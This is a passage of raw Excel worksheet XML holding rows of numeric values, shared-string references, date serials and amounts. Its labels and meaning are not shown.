      </c>
      <c r="H3745">
        <v>80000</v>
      </c>
      <c r="J3745" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="3746" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3746">
        <v>24007</v>
      </c>
      <c r="B3746">
        <v>2367</v>
      </c>
      <c r="C3746" t="s">
        <v>6093</v>
      </c>
      <c r="D3746" t="s">
        <v>13026</v>
      </c>
      <c r="E3746">
        <v>11</v>
      </c>
      <c r="F3746" t="s">
        <v>609</v>
      </c>
      <c r="G3746" s="1">
        <v>44287</v>
      </c>
      <c r="H3746">
        <v>60000</v>
      </c>
      <c r="J3746" t="s">
        <v>13027</v>
      </c>
    </row>
    <row r="3747" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3747">
        <v>24008</v>
      </c>
      <c r="B3747">
        <v>1571</v>
      </c>
      <c r="C3747" t="s">
        <v>4192</v>
      </c>
      <c r="D3747" t="s">
        <v>13028</v>
      </c>
      <c r="E3747">
        <v>13</v>
      </c>
      <c r="F3747" t="s">
        <v>13029</v>
      </c>
      <c r="G3747" s="1">
        <v>44265</v>
      </c>
      <c r="H3747">
        <v>2880</v>
      </c>
      <c r="I3747" t="s">
        <v>13030</v>
      </c>
    </row>
    <row r="3748" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3748">
        <v>24014</v>
      </c>
      <c r="B3748">
        <v>1571</v>
      </c>
      <c r="C3748" t="s">
        <v>4192</v>
      </c>
      <c r="D3748" t="s">
        <v>13028</v>
      </c>
      <c r="E3748">
        <v>13</v>
      </c>
      <c r="F3748" t="s">
        <v>1276</v>
      </c>
      <c r="G3748" s="1">
        <v>44265</v>
      </c>
      <c r="H3748">
        <v>120</v>
      </c>
      <c r="I3748" t="s">
        <v>13031</v>
      </c>
    </row>
    <row r="3749" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3749">
        <v>24015</v>
      </c>
      <c r="B3749">
        <v>5204</v>
      </c>
      <c r="C3749" t="s">
        <v>8311</v>
      </c>
      <c r="D3749" t="s">
        <v>13032</v>
      </c>
      <c r="E3749">
        <v>26</v>
      </c>
      <c r="F3749" t="s">
        <v>4686</v>
      </c>
      <c r="G3749" s="1">
        <v>44237</v>
      </c>
      <c r="H3749">
        <v>20000</v>
      </c>
      <c r="J3749" t="s">
        <v>11974</v>
      </c>
    </row>
    <row r="3750" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3750">
        <v>24016</v>
      </c>
      <c r="B3750">
        <v>5204</v>
      </c>
      <c r="C3750" t="s">
        <v>8311</v>
      </c>
      <c r="D3750" t="s">
        <v>13032</v>
      </c>
      <c r="E3750">
        <v>26</v>
      </c>
      <c r="F3750" t="s">
        <v>6917</v>
      </c>
      <c r="G3750" s="1">
        <v>44237</v>
      </c>
      <c r="H3750">
        <v>15000</v>
      </c>
      <c r="J3750" t="s">
        <v>11974</v>
      </c>
    </row>
    <row r="3751" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3751">
        <v>24017</v>
      </c>
      <c r="B3751">
        <v>57</v>
      </c>
      <c r="C3751" t="s">
        <v>1968</v>
      </c>
      <c r="D3751" t="s">
        <v>12288</v>
      </c>
      <c r="E3751">
        <v>12</v>
      </c>
      <c r="F3751" t="s">
        <v>13033</v>
      </c>
      <c r="G3751" s="1">
        <v>44253</v>
      </c>
      <c r="H3751">
        <v>99986</v>
      </c>
      <c r="I3751" t="s">
        <v>13034</v>
      </c>
    </row>
    <row r="3752" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3752">
        <v>24018</v>
      </c>
      <c r="B3752">
        <v>57</v>
      </c>
      <c r="C3752" t="s">
        <v>1968</v>
      </c>
      <c r="D3752" t="s">
        <v>12288</v>
      </c>
      <c r="E3752">
        <v>12</v>
      </c>
      <c r="F3752" t="s">
        <v>9460</v>
      </c>
      <c r="G3752" s="1">
        <v>44253</v>
      </c>
      <c r="H3752">
        <v>0</v>
      </c>
      <c r="I3752" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3753" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3753">
        <v>24019</v>
      </c>
      <c r="B3753">
        <v>57</v>
      </c>
      <c r="C3753" t="s">
        <v>1968</v>
      </c>
      <c r="D3753" t="s">
        <v>12288</v>
      </c>
      <c r="E3753">
        <v>12</v>
      </c>
      <c r="F3753" t="s">
        <v>9579</v>
      </c>
      <c r="G3753" s="1">
        <v>44253</v>
      </c>
      <c r="H3753">
        <v>0</v>
      </c>
      <c r="I3753" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3754" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3754">
        <v>24020</v>
      </c>
      <c r="B3754">
        <v>57</v>
      </c>
      <c r="C3754" t="s">
        <v>1968</v>
      </c>
      <c r="D3754" t="s">
        <v>12288</v>
      </c>
      <c r="E3754">
        <v>12</v>
      </c>
      <c r="F3754" t="s">
        <v>9437</v>
      </c>
      <c r="G3754" s="1">
        <v>44253</v>
      </c>
      <c r="H3754">
        <v>0</v>
      </c>
      <c r="I3754" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3755" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3755">
        <v>24021</v>
      </c>
      <c r="B3755">
        <v>57</v>
      </c>
      <c r="C3755" t="s">
        <v>1968</v>
      </c>
      <c r="D3755" t="s">
        <v>12288</v>
      </c>
      <c r="E3755">
        <v>12</v>
      </c>
      <c r="F3755" t="s">
        <v>9435</v>
      </c>
      <c r="G3755" s="1">
        <v>44253</v>
      </c>
      <c r="H3755">
        <v>0</v>
      </c>
      <c r="I3755" t="s">
        <v>10029</v>
      </c>
    </row>
    <row r="3756" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3756">
        <v>24022</v>
      </c>
      <c r="B3756">
        <v>5281</v>
      </c>
      <c r="C3756" t="s">
        <v>8444</v>
      </c>
      <c r="D3756" t="s">
        <v>13035</v>
      </c>
      <c r="E3756">
        <v>5</v>
      </c>
      <c r="F3756" t="s">
        <v>13036</v>
      </c>
      <c r="G3756" s="1">
        <v>44309</v>
      </c>
      <c r="H3756">
        <v>2500</v>
      </c>
      <c r="I3756" t="s">
        <v>9638</v>
      </c>
      <c r="J3756" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3757" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3757">
        <v>24023</v>
      </c>
      <c r="B3757">
        <v>5281</v>
      </c>
      <c r="C3757" t="s">
        <v>8444</v>
      </c>
      <c r="D3757" t="s">
        <v>13035</v>
      </c>
      <c r="E3757">
        <v>5</v>
      </c>
      <c r="F3757" t="s">
        <v>13037</v>
      </c>
      <c r="G3757" s="1">
        <v>44309</v>
      </c>
      <c r="H3757">
        <v>3000</v>
      </c>
      <c r="I3757" t="s">
        <v>9638</v>
      </c>
      <c r="J3757" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3758" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3758">
        <v>24024</v>
      </c>
      <c r="B3758">
        <v>5281</v>
      </c>
      <c r="C3758" t="s">
        <v>8444</v>
      </c>
      <c r="D3758" t="s">
        <v>13035</v>
      </c>
      <c r="E3758">
        <v>5</v>
      </c>
      <c r="F3758" t="s">
        <v>9527</v>
      </c>
      <c r="G3758" s="1">
        <v>44309</v>
      </c>
      <c r="H3758">
        <v>2000</v>
      </c>
      <c r="I3758" t="s">
        <v>9638</v>
      </c>
      <c r="J3758" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3759" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3759">
        <v>24025</v>
      </c>
      <c r="B3759">
        <v>1417</v>
      </c>
      <c r="C3759" t="s">
        <v>4234</v>
      </c>
      <c r="D3759" t="s">
        <v>13038</v>
      </c>
      <c r="E3759">
        <v>14</v>
      </c>
      <c r="F3759" t="s">
        <v>12996</v>
      </c>
      <c r="G3759" s="1">
        <v>44260</v>
      </c>
      <c r="H3759">
        <v>7200000</v>
      </c>
      <c r="I3759" t="s">
        <v>13039</v>
      </c>
    </row>
    <row r="3760" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3760">
        <v>24027</v>
      </c>
      <c r="B3760">
        <v>124</v>
      </c>
      <c r="C3760" t="s">
        <v>2260</v>
      </c>
      <c r="D3760" t="s">
        <v>12993</v>
      </c>
      <c r="E3760">
        <v>12</v>
      </c>
      <c r="F3760" t="s">
        <v>13040</v>
      </c>
      <c r="G3760" s="1">
        <v>44274</v>
      </c>
      <c r="H3760">
        <v>30000</v>
      </c>
      <c r="J3760" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="3761" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3761">
        <v>24029</v>
      </c>
      <c r="B3761">
        <v>2734</v>
      </c>
      <c r="C3761" t="s">
        <v>6018</v>
      </c>
      <c r="D3761" t="s">
        <v>13041</v>
      </c>
      <c r="E3761">
        <v>14</v>
      </c>
      <c r="F3761" t="s">
        <v>3076</v>
      </c>
      <c r="G3761" s="1">
        <v>44286</v>
      </c>
      <c r="H3761">
        <v>1500000</v>
      </c>
      <c r="I3761" t="s">
        <v>13042</v>
      </c>
      <c r="J3761" t="s">
        <v>13043</v>
      </c>
    </row>
    <row r="3762" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3762">
        <v>24030</v>
      </c>
      <c r="B3762">
        <v>2734</v>
      </c>
      <c r="C3762" t="s">
        <v>6018</v>
      </c>
      <c r="D3762" t="s">
        <v>13041</v>
      </c>
      <c r="E3762">
        <v>14</v>
      </c>
      <c r="F3762" t="s">
        <v>9437</v>
      </c>
      <c r="G3762" s="1">
        <v>44286</v>
      </c>
      <c r="H3762">
        <v>100000</v>
      </c>
      <c r="J3762" t="s">
        <v>13044</v>
      </c>
    </row>
    <row r="3763" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3763">
        <v>24031</v>
      </c>
      <c r="B3763">
        <v>2734</v>
      </c>
      <c r="C3763" t="s">
        <v>6018</v>
      </c>
      <c r="D3763" t="s">
        <v>13041</v>
      </c>
      <c r="E3763">
        <v>14</v>
      </c>
      <c r="F3763" t="s">
        <v>13045</v>
      </c>
      <c r="G3763" s="1">
        <v>44286</v>
      </c>
      <c r="H3763">
        <v>1000000</v>
      </c>
      <c r="J3763" t="s">
        <v>13046</v>
      </c>
    </row>
    <row r="3764" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3764">
        <v>24032</v>
      </c>
      <c r="B3764">
        <v>2734</v>
      </c>
      <c r="C3764" t="s">
        <v>6018</v>
      </c>
      <c r="D3764" t="s">
        <v>13041</v>
      </c>
      <c r="E3764">
        <v>14</v>
      </c>
      <c r="F3764" t="s">
        <v>13047</v>
      </c>
      <c r="G3764" s="1">
        <v>44286</v>
      </c>
      <c r="H3764">
        <v>100000</v>
      </c>
      <c r="J3764" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="3765" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3765">
        <v>24035</v>
      </c>
      <c r="B3765">
        <v>5057</v>
      </c>
      <c r="C3765" t="s">
        <v>2301</v>
      </c>
      <c r="D3765" t="s">
        <v>13048</v>
      </c>
      <c r="E3765">
        <v>32</v>
      </c>
      <c r="F3765" t="s">
        <v>13049</v>
      </c>
      <c r="G3765" s="1">
        <v>44225</v>
      </c>
      <c r="H3765">
        <v>8000</v>
      </c>
      <c r="I3765" t="s">
        <v>9550</v>
      </c>
      <c r="J3765" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3766" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3766">
        <v>24036</v>
      </c>
      <c r="B3766">
        <v>5057</v>
      </c>
      <c r="C3766" t="s">
        <v>2301</v>
      </c>
      <c r="D3766" t="s">
        <v>13048</v>
      </c>
      <c r="E3766">
        <v>32</v>
      </c>
      <c r="F3766" t="s">
        <v>13050</v>
      </c>
      <c r="G3766" s="1">
        <v>44225</v>
      </c>
      <c r="H3766">
        <v>8000</v>
      </c>
      <c r="I3766" t="s">
        <v>9550</v>
      </c>
      <c r="J3766" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3767" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3767">
        <v>24037</v>
      </c>
      <c r="B3767">
        <v>5057</v>
      </c>
      <c r="C3767" t="s">
        <v>2301</v>
      </c>
      <c r="D3767" t="s">
        <v>13048</v>
      </c>
      <c r="E3767">
        <v>32</v>
      </c>
      <c r="F3767" t="s">
        <v>13051</v>
      </c>
      <c r="G3767" s="1">
        <v>44225</v>
      </c>
      <c r="H3767">
        <v>9000</v>
      </c>
      <c r="I3767" t="s">
        <v>9550</v>
      </c>
      <c r="J3767" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3768" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3768">
        <v>24038</v>
      </c>
      <c r="B3768">
        <v>5057</v>
      </c>
      <c r="C3768" t="s">
        <v>2301</v>
      </c>
      <c r="D3768" t="s">
        <v>13048</v>
      </c>
      <c r="E3768">
        <v>32</v>
      </c>
      <c r="F3768" t="s">
        <v>13052</v>
      </c>
      <c r="G3768" s="1">
        <v>44225</v>
      </c>
      <c r="H3768">
        <v>9000</v>
      </c>
      <c r="I3768" t="s">
        <v>9550</v>
      </c>
      <c r="J3768" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3769" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3769">
        <v>24039</v>
      </c>
      <c r="B3769">
        <v>5057</v>
      </c>
      <c r="C3769" t="s">
        <v>2301</v>
      </c>
      <c r="D3769" t="s">
        <v>13048</v>
      </c>
      <c r="E3769">
        <v>32</v>
      </c>
      <c r="F3769" t="s">
        <v>10304</v>
      </c>
      <c r="G3769" s="1">
        <v>44225</v>
      </c>
      <c r="H3769">
        <v>7500</v>
      </c>
      <c r="I3769" t="s">
        <v>9550</v>
      </c>
      <c r="J3769" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3770" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3770">
        <v>24040</v>
      </c>
      <c r="B3770">
        <v>5057</v>
      </c>
      <c r="C3770" t="s">
        <v>2301</v>
      </c>
      <c r="D3770" t="s">
        <v>13048</v>
      </c>
      <c r="E3770">
        <v>32</v>
      </c>
      <c r="F3770" t="s">
        <v>9610</v>
      </c>
      <c r="G3770" s="1">
        <v>44225</v>
      </c>
      <c r="H3770">
        <v>7500</v>
      </c>
      <c r="I3770" t="s">
        <v>9550</v>
      </c>
      <c r="J3770" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3771" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3771">
        <v>24041</v>
      </c>
      <c r="B3771">
        <v>5057</v>
      </c>
      <c r="C3771" t="s">
        <v>2301</v>
      </c>
      <c r="D3771" t="s">
        <v>13048</v>
      </c>
      <c r="E3771">
        <v>32</v>
      </c>
      <c r="F3771" t="s">
        <v>4686</v>
      </c>
      <c r="G3771" s="1">
        <v>44225</v>
      </c>
      <c r="H3771">
        <v>9000</v>
      </c>
      <c r="I3771" t="s">
        <v>9550</v>
      </c>
      <c r="J3771" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3772" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3772">
        <v>24042</v>
      </c>
      <c r="B3772">
        <v>5057</v>
      </c>
      <c r="C3772" t="s">
        <v>2301</v>
      </c>
      <c r="D3772" t="s">
        <v>13048</v>
      </c>
      <c r="E3772">
        <v>32</v>
      </c>
      <c r="F3772" t="s">
        <v>2236</v>
      </c>
      <c r="G3772" s="1">
        <v>44225</v>
      </c>
      <c r="H3772">
        <v>9000</v>
      </c>
      <c r="I3772" t="s">
        <v>9550</v>
      </c>
      <c r="J3772" t="s">
        <v>9501</v>
      </c>
    </row>
    <row r="3773" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3773">
        <v>24043</v>
      </c>
      <c r="B3773">
        <v>5273</v>
      </c>
      <c r="C3773" t="s">
        <v>8472</v>
      </c>
      <c r="D3773" t="s">
        <v>13053</v>
      </c>
      <c r="E3773">
        <v>4</v>
      </c>
      <c r="F3773" t="s">
        <v>8474</v>
      </c>
      <c r="G3773" s="1">
        <v>44224</v>
      </c>
      <c r="H3773">
        <v>120</v>
      </c>
      <c r="I3773" t="s">
        <v>13054</v>
      </c>
    </row>
    <row r="3774" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3774">
        <v>24044</v>
      </c>
      <c r="B3774">
        <v>5275</v>
      </c>
      <c r="C3774" t="s">
        <v>8487</v>
      </c>
      <c r="D3774" t="s">
        <v>13055</v>
      </c>
      <c r="E3774">
        <v>4</v>
      </c>
      <c r="F3774" t="s">
        <v>13056</v>
      </c>
      <c r="G3774" s="1">
        <v>44224</v>
      </c>
      <c r="H3774">
        <v>100</v>
      </c>
      <c r="I3774" t="s">
        <v>13057</v>
      </c>
    </row>
    <row r="3775" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3775">
        <v>24045</v>
      </c>
      <c r="B3775">
        <v>5272</v>
      </c>
      <c r="C3775" t="s">
        <v>8494</v>
      </c>
      <c r="D3775" t="s">
        <v>13058</v>
      </c>
      <c r="E3775">
        <v>4</v>
      </c>
      <c r="F3775" t="s">
        <v>8496</v>
      </c>
      <c r="G3775" s="1">
        <v>44224</v>
      </c>
      <c r="H3775">
        <v>60</v>
      </c>
      <c r="I3775" t="s">
        <v>13057</v>
      </c>
    </row>
    <row r="3776" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3776">
        <v>24046</v>
      </c>
      <c r="B3776">
        <v>5249</v>
      </c>
      <c r="C3776" t="s">
        <v>8500</v>
      </c>
      <c r="D3776" t="s">
        <v>13059</v>
      </c>
      <c r="E3776">
        <v>16</v>
      </c>
      <c r="F3776" t="s">
        <v>364</v>
      </c>
      <c r="G3776" s="1">
        <v>44238</v>
      </c>
      <c r="H3776">
        <v>7200000</v>
      </c>
      <c r="J3776" t="s">
        <v>10793</v>
      </c>
    </row>
    <row r="3777" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3777">
        <v>24047</v>
      </c>
      <c r="B3777">
        <v>5298</v>
      </c>
      <c r="C3777" t="s">
        <v>8458</v>
      </c>
      <c r="D3777" t="s">
        <v>13060</v>
      </c>
      <c r="E3777">
        <v>16</v>
      </c>
      <c r="F3777" t="s">
        <v>364</v>
      </c>
      <c r="G3777" s="1">
        <v>44284</v>
      </c>
      <c r="H3777">
        <v>4000000</v>
      </c>
      <c r="I3777" t="s">
        <v>12269</v>
      </c>
      <c r="J3777" t="s">
        <v>13061</v>
      </c>
    </row>
    <row r="3778" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3778">
        <v>24048</v>
      </c>
      <c r="B3778">
        <v>1402</v>
      </c>
      <c r="C3778" t="s">
        <v>3962</v>
      </c>
      <c r="D3778" t="s">
        <v>13062</v>
      </c>
      <c r="E3778">
        <v>3</v>
      </c>
      <c r="F3778" t="s">
        <v>13063</v>
      </c>
      <c r="G3778" s="1">
        <v>44238</v>
      </c>
      <c r="H3778">
        <v>1080</v>
      </c>
      <c r="I3778" t="s">
        <v>13064</v>
      </c>
    </row>
    <row r="3779" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3779">
        <v>24049</v>
      </c>
      <c r="B3779">
        <v>1402</v>
      </c>
      <c r="C3779" t="s">
        <v>3962</v>
      </c>
      <c r="D3779" t="s">
        <v>13062</v>
      </c>
      <c r="E3779">
        <v>3</v>
      </c>
      <c r="F3779" t="s">
        <v>11351</v>
      </c>
      <c r="G3779" s="1">
        <v>44238</v>
      </c>
      <c r="H3779">
        <v>1800</v>
      </c>
      <c r="I3779" t="s">
        <v>13064</v>
      </c>
    </row>
    <row r="3780" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3780">
        <v>24050</v>
      </c>
      <c r="B3780">
        <v>1402</v>
      </c>
      <c r="C3780" t="s">
        <v>3962</v>
      </c>
      <c r="D3780" t="s">
        <v>13062</v>
      </c>
      <c r="E3780">
        <v>3</v>
      </c>
      <c r="F3780" t="s">
        <v>13065</v>
      </c>
      <c r="G3780" s="1">
        <v>44238</v>
      </c>
      <c r="H3780">
        <v>600</v>
      </c>
      <c r="I3780" t="s">
        <v>13064</v>
      </c>
    </row>
    <row r="3781" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3781">
        <v>24051</v>
      </c>
      <c r="B3781">
        <v>5274</v>
      </c>
      <c r="C3781" t="s">
        <v>8480</v>
      </c>
      <c r="D3781" t="s">
        <v>13066</v>
      </c>
      <c r="E3781">
        <v>4</v>
      </c>
      <c r="F3781" t="s">
        <v>8295</v>
      </c>
      <c r="G3781" s="1">
        <v>44225</v>
      </c>
      <c r="H3781">
        <v>18000</v>
      </c>
      <c r="I3781" t="s">
        <v>13054</v>
      </c>
    </row>
    <row r="3782" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3782">
        <v>24052</v>
      </c>
      <c r="B3782">
        <v>485</v>
      </c>
      <c r="C3782" t="s">
        <v>2182</v>
      </c>
      <c r="D3782" t="s">
        <v>13067</v>
      </c>
      <c r="E3782">
        <v>29</v>
      </c>
      <c r="F3782" t="s">
        <v>2236</v>
      </c>
      <c r="G3782" s="1">
        <v>44267</v>
      </c>
      <c r="H3782">
        <v>1000</v>
      </c>
      <c r="J3782" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3783" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3783">
        <v>24053</v>
      </c>
      <c r="B3783">
        <v>5296</v>
      </c>
      <c r="C3783" t="s">
        <v>8506</v>
      </c>
      <c r="D3783" t="s">
        <v>13068</v>
      </c>
      <c r="E3783">
        <v>14</v>
      </c>
      <c r="F3783" t="s">
        <v>10309</v>
      </c>
      <c r="G3783" s="1">
        <v>44280</v>
      </c>
      <c r="H3783">
        <v>20000</v>
      </c>
      <c r="I3783" t="s">
        <v>13069</v>
      </c>
    </row>
    <row r="3784" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3784">
        <v>24054</v>
      </c>
      <c r="B3784">
        <v>5296</v>
      </c>
      <c r="C3784" t="s">
        <v>8506</v>
      </c>
      <c r="D3784" t="s">
        <v>13068</v>
      </c>
      <c r="E3784">
        <v>14</v>
      </c>
      <c r="F3784" t="s">
        <v>9438</v>
      </c>
      <c r="G3784" s="1">
        <v>44280</v>
      </c>
      <c r="H3784">
        <v>20000</v>
      </c>
      <c r="I3784" t="s">
        <v>13069</v>
      </c>
    </row>
    <row r="3785" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3785">
        <v>24055</v>
      </c>
      <c r="B3785">
        <v>1375</v>
      </c>
      <c r="C3785" t="s">
        <v>4000</v>
      </c>
      <c r="D3785" t="s">
        <v>12941</v>
      </c>
      <c r="E3785">
        <v>17</v>
      </c>
      <c r="F3785" t="s">
        <v>13070</v>
      </c>
      <c r="G3785" s="1">
        <v>44229</v>
      </c>
      <c r="H3785">
        <v>5000</v>
      </c>
      <c r="I3785" t="s">
        <v>12942</v>
      </c>
      <c r="J3785" t="s">
        <v>11421</v>
      </c>
    </row>
    <row r="3786" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3786">
        <v>24056</v>
      </c>
      <c r="B3786">
        <v>608</v>
      </c>
      <c r="C3786" t="s">
        <v>1106</v>
      </c>
      <c r="D3786" t="s">
        <v>13071</v>
      </c>
      <c r="E3786">
        <v>13</v>
      </c>
      <c r="F3786" t="s">
        <v>13072</v>
      </c>
      <c r="G3786" s="1">
        <v>44309</v>
      </c>
      <c r="H3786">
        <v>480000</v>
      </c>
      <c r="J3786" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="3787" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3787">
        <v>24057</v>
      </c>
      <c r="B3787">
        <v>608</v>
      </c>
      <c r="C3787" t="s">
        <v>1106</v>
      </c>
      <c r="D3787" t="s">
        <v>13071</v>
      </c>
      <c r="E3787">
        <v>13</v>
      </c>
      <c r="F3787" t="s">
        <v>10463</v>
      </c>
      <c r="G3787" s="1">
        <v>44309</v>
      </c>
      <c r="H3787">
        <v>500000</v>
      </c>
      <c r="J3787" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="3788" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3788">
        <v>24058</v>
      </c>
      <c r="B3788">
        <v>608</v>
      </c>
      <c r="C3788" t="s">
        <v>1106</v>
      </c>
      <c r="D3788" t="s">
        <v>13071</v>
      </c>
      <c r="E3788">
        <v>13</v>
      </c>
      <c r="F3788" t="s">
        <v>1746</v>
      </c>
      <c r="G3788" s="1">
        <v>44309</v>
      </c>
      <c r="H3788">
        <v>30000</v>
      </c>
      <c r="J3788" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="3789" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3789">
        <v>24060</v>
      </c>
      <c r="B3789">
        <v>485</v>
      </c>
      <c r="C3789" t="s">
        <v>2182</v>
      </c>
      <c r="D3789" t="s">
        <v>13067</v>
      </c>
      <c r="E3789">
        <v>29</v>
      </c>
      <c r="F3789" t="s">
        <v>13073</v>
      </c>
      <c r="G3789" s="1">
        <v>44267</v>
      </c>
      <c r="H3789">
        <v>1000</v>
      </c>
      <c r="J3789" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3790" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3790">
        <v>24061</v>
      </c>
      <c r="B3790">
        <v>485</v>
      </c>
      <c r="C3790" t="s">
        <v>2182</v>
      </c>
      <c r="D3790" t="s">
        <v>13067</v>
      </c>
      <c r="E3790">
        <v>29</v>
      </c>
      <c r="F3790" t="s">
        <v>11579</v>
      </c>
      <c r="G3790" s="1">
        <v>44267</v>
      </c>
      <c r="H3790">
        <v>1000</v>
      </c>
      <c r="J3790" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3791" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3791">
        <v>24062</v>
      </c>
      <c r="B3791">
        <v>485</v>
      </c>
      <c r="C3791" t="s">
        <v>2182</v>
      </c>
      <c r="D3791" t="s">
        <v>13067</v>
      </c>
      <c r="E3791">
        <v>29</v>
      </c>
      <c r="F3791" t="s">
        <v>4686</v>
      </c>
      <c r="G3791" s="1">
        <v>44267</v>
      </c>
      <c r="H3791">
        <v>1000</v>
      </c>
      <c r="J3791" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3792" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3792">
        <v>24063</v>
      </c>
      <c r="B3792">
        <v>485</v>
      </c>
      <c r="C3792" t="s">
        <v>2182</v>
      </c>
      <c r="D3792" t="s">
        <v>13067</v>
      </c>
      <c r="E3792">
        <v>29</v>
      </c>
      <c r="F3792" t="s">
        <v>10781</v>
      </c>
      <c r="G3792" s="1">
        <v>44267</v>
      </c>
      <c r="H3792">
        <v>1000</v>
      </c>
      <c r="J3792" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3793" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3793">
        <v>24064</v>
      </c>
      <c r="B3793">
        <v>2734</v>
      </c>
      <c r="C3793" t="s">
        <v>6018</v>
      </c>
      <c r="D3793" t="s">
        <v>13041</v>
      </c>
      <c r="E3793">
        <v>14</v>
      </c>
      <c r="F3793" t="s">
        <v>1746</v>
      </c>
      <c r="G3793" s="1">
        <v>44286</v>
      </c>
      <c r="H3793">
        <v>100000</v>
      </c>
      <c r="J3793" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="3794" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3794">
        <v>24065</v>
      </c>
      <c r="B3794">
        <v>2734</v>
      </c>
      <c r="C3794" t="s">
        <v>6018</v>
      </c>
      <c r="D3794" t="s">
        <v>13041</v>
      </c>
      <c r="E3794">
        <v>14</v>
      </c>
      <c r="F3794" t="s">
        <v>9523</v>
      </c>
      <c r="G3794" s="1">
        <v>44286</v>
      </c>
      <c r="H3794">
        <v>500</v>
      </c>
      <c r="J3794" t="s">
        <v>10662</v>
      </c>
    </row>
    <row r="3795" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3795">
        <v>24066</v>
      </c>
      <c r="B3795">
        <v>2734</v>
      </c>
      <c r="C3795" t="s">
        <v>6018</v>
      </c>
      <c r="D3795" t="s">
        <v>13041</v>
      </c>
      <c r="E3795">
        <v>14</v>
      </c>
      <c r="F3795" t="s">
        <v>9435</v>
      </c>
      <c r="G3795" s="1">
        <v>44286</v>
      </c>
      <c r="H3795">
        <v>500000</v>
      </c>
      <c r="J3795" t="s">
        <v>11093</v>
      </c>
    </row>
    <row r="3796" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3796">
        <v>24068</v>
      </c>
      <c r="B3796">
        <v>485</v>
      </c>
      <c r="C3796" t="s">
        <v>2182</v>
      </c>
      <c r="D3796" t="s">
        <v>13067</v>
      </c>
      <c r="E3796">
        <v>29</v>
      </c>
      <c r="F3796" t="s">
        <v>9928</v>
      </c>
      <c r="G3796" s="1">
        <v>44267</v>
      </c>
      <c r="H3796">
        <v>1000</v>
      </c>
      <c r="J3796" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3797" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3797">
        <v>24069</v>
      </c>
      <c r="B3797">
        <v>485</v>
      </c>
      <c r="C3797" t="s">
        <v>2182</v>
      </c>
      <c r="D3797" t="s">
        <v>13067</v>
      </c>
      <c r="E3797">
        <v>29</v>
      </c>
      <c r="F3797" t="s">
        <v>5434</v>
      </c>
      <c r="G3797" s="1">
        <v>44267</v>
      </c>
      <c r="H3797">
        <v>1000</v>
      </c>
      <c r="J3797" t="s">
        <v>9456</v>
